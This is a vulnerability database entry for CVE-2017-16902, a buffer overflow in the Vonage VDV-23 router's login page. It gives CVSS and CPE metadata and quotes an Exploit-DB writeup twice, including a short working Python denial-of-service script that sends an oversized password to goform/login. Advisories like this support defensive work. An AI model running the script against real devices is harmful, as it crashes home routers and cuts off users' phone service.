Search...

CVE-2017-16902

2017-11-20T18:29:00

ID CVE-2017-16902
Type cve
Reporter cve@mitre.org
Modified 2017-12-12T15:58:00

Description

On the Vonage VDV-23 115 3.2.11-0.9.40 home router, sending a long string of characters in the loginPassword and/or loginUsername field to goform/login causes the router to reboot.

JSON Vulners Source

Initial Source

{"id": "CVE-2017-16902", "bulletinFamily": "NVD", "title": "CVE-2017-16902", "description": "On the Vonage VDV-23 115 3.2.11-0.9.40 home router, sending a long string of characters in the loginPassword and/or loginUsername field to goform/login causes the router to reboot.", "published": "2017-11-20T18:29:00", "modified": "2017-12-12T15:58:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16902", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/43164/", "http://gh0s7.net/vonage2"], "cvelist": ["CVE-2017-16902"], "type": "cve", "lastseen": "2021-02-02T06:36:40", "edition": 4, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:43164"]}, {"type": "zdt", "idList": ["1337DAY-ID-29032"]}], "modified": "2021-02-02T06:36:40", "rev": 2}, "score": {"value": 3.8, "vector": "NONE", "modified": "2021-02-02T06:36:40", "rev": 2}, "vulnersScore": 3.8}, "cpe": ["cpe:/o:vonage:vdv-23_firmware:3.2.11-0.9.40"], "affectedSoftware": [{"cpeName": "vonage:vdv-23_firmware", "name": "vonage vdv-23 firmware", "operator": "eq", "version": "3.2.11-0.9.40"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": ["cpe:2.3:o:vonage:vdv-23_firmware:3.2.11-0.9.40:*:*:*:*:*:*:*"], "cwe": ["CWE-119"], "scheme": null, "affectedConfiguration": [{"cpeName": "vonage:vdv-23", "name": "vonage vdv-23", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:h:vonage:vdv-23:-:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:vonage:vdv-23_firmware:3.2.11-0.9.40:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}], "operator": "AND"}]}, "extraReferences": [{"name": "http://gh0s7.net/vonage2", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "http://gh0s7.net/vonage2"}, {"name": "43164", "refsource": "EXPLOIT-DB", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/43164/"}]}

{"exploitdb": [{"lastseen": "2017-11-22T11:00:37", "description": "Vonage VDV-23 - Denial of Service. CVE-2017-16902. Dos exploit for Hardware platform", "published": "2017-11-21T00:00:00", "type": "exploitdb", "title": "Vonage VDV-23 - Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16902"], "modified": "2017-11-21T00:00:00", "id": "EDB-ID:43164", "href": "https://www.exploit-db.com/exploits/43164/", "sourceData": "Overview\r\nDuring an evaluation of the Vonage home phone router, it was identified that the loginUsername and loginPassword parameters were vulnerable to a buffer overflow. This overflow caused the router to crash and reboot. Further analysis will be performed to find out if the the crash is controllable and allow for full remote code execution.\r\n\r\nDevice Description:\r\n1 port residential gateway\r\n\r\nHardware Version:\r\nVDV-23: 115\r\n\r\nOriginal Software Version:\r\n3.2.11-0.9.40\r\n\r\nExploitation Writeup\r\nThis exploit was a simple buffer overflow. The use of spike fuzzer took place to identify the crash condition. When the application crashes, the router reboots causing a denial of service condition. The script below was further weaponized to sleep for a 60 second period while the device rebooted then continue one execution after another.\r\n\r\nProof of concept code:\r\nThe code below was used to exploit the application. This testing was only performed against denial of service conditions. The crash that was experienced potentially holds the ability to allow remote code execution. Further research will be performed against the device.\r\n\r\nDOSTest.py\r\n\r\nimport requests\u2028\r\npassw = 'A' * 10580\u2028post_data = {'loginUsername':'router', 'loginPassword':passw, 'x':'0', 'y':'0'}\u2028\r\npost_response = requests.post(url='http://192.168.15.1/goform/login', data=post_data)", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43164/"}], "zdt": [{"lastseen": "2018-02-09T05:19:46", "description": "Exploit for hardware platform in category dos / poc", "edition": 1, "published": "2017-11-22T00:00:00", "title": "Vonage VDV-23 - Denial of Service Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16902"], "modified": "2017-11-22T00:00:00", "href": "https://0day.today/exploit/description/29032", "id": "1337DAY-ID-29032", "sourceData": "Overview\r\nDuring an evaluation of the Vonage home phone router, it was identified that the loginUsername and loginPassword parameters were vulnerable to a buffer overflow. This overflow caused the router to crash and reboot. Further analysis will be performed to find out if the the crash is controllable and allow for full remote code execution.\r\n \r\nDevice Description:\r\n1 port residential gateway\r\n \r\nHardware Version:\r\nVDV-23: 115\r\n \r\nOriginal Software Version:\r\n3.2.11-0.9.40\r\n \r\nExploitation Writeup\r\nThis exploit was a simple buffer overflow. The use of spike fuzzer took place to identify the crash condition. When the application crashes, the router reboots causing a denial of service condition. The script below was further weaponized to sleep for a 60 second period while the device rebooted then continue one execution after another.\r\n \r\nProof of concept code:\r\nThe code below was used to exploit the application. This testing was only performed against denial of service conditions. The crash that was experienced potentially holds the ability to allow remote code execution. Further research will be performed against the device.\r\n \r\nDOSTest.py\r\n \r\nimport requests\u2028\r\npassw = 'A' * 10580\u2028post_data = {'loginUsername':'router', 'loginPassword':passw, 'x':'0', 'y':'0'}\u2028\r\npost_response = requests.post(url='http://192.168.15.1/goform/login', data=post_data)\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/29032"}]}